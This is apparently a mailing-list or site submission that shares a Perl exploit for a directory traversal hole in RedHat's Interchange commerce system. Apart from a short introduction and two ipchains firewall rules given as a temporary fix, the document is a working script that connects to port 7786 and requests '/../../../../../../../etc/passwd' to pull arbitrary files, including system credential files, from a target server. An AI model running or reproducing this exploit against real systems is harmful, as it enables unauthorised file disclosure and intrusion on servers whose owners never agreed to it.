This exploit works against a recent bug found in RedHat's Interchange commerce system that allows for the typical directory traversal attack.
cae98e6dba628c388417c537483021da06e3b2e787e407c76f59d8135f23ef5e
First off, great site ! I appreciate all the work you do.
I just wanted to send in a quick and dirty perl script to retrieve any file from a server running RedHat's Interchange commerce system. The temp fix for this can be to use ipchains/iptables to block access to the port from outside the server.
/sbin/ipchains -A input -s 127.0.0.1 -d 127.0.0.1 7786 -p tcp -y -j ACCEPT
/sbin/ipchains -A input -s 0/0 -d 0/0 7786 -p tcp -y -j DENY
Redhat knows about it and I haven't checked my bugtraq/vuln-dev/fulldiscloser addy's in a few days, so not sure if this is even public or not.. I did not discover it, I have however been using the below script as a way to test if the servers are vulnerable without having to telnet to each one. The is another version (final versiopn actually) that reads the 'targets' from a file, but that's just not really needed. anyone who needs that can add it in themselves..
#!/usr/bin/perl
#
# decker@n3t.net
# http://n3t.net
#
# grabs the file $thashit from the remote server
# using a gaping hole in RH's Interchange
#
################
use Socket;
$host=$ARGV[0];
$port = 7786;
$thashit= "/etc/passwd";
$time = localtime(time);
print "Trying to get $thashit from $host\n";
$tcpval = getprotobyname('tcp');
$serverIP = inet_aton($host);
$serverAddr = sockaddr_in(80, $serverIP);
$protocol_name = "tcp";
$iaddr = inet_aton($host) || die print("Failed to find host: $host");
$paddr = sockaddr_in($port, $iaddr) || die print("Something went wrong ... dieing...");
$proto = getprotobyname('tcp') || die print("Unable to get protocol");
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die print("Failed to open socket: $!");
connect(SOCK, $paddr) || die print("Unable to connect: $!");
$submit = "GET /../../../../../../..$thashit\n\n";
send(SOCK,$submit,0);
@thedata=<SOCK>;
#recv(SOCK, $thedata, 10000, undef);
close (SOCK);
foreach $lin(@thedata) {
print "$lin";
}
print "\nEOF\n\n";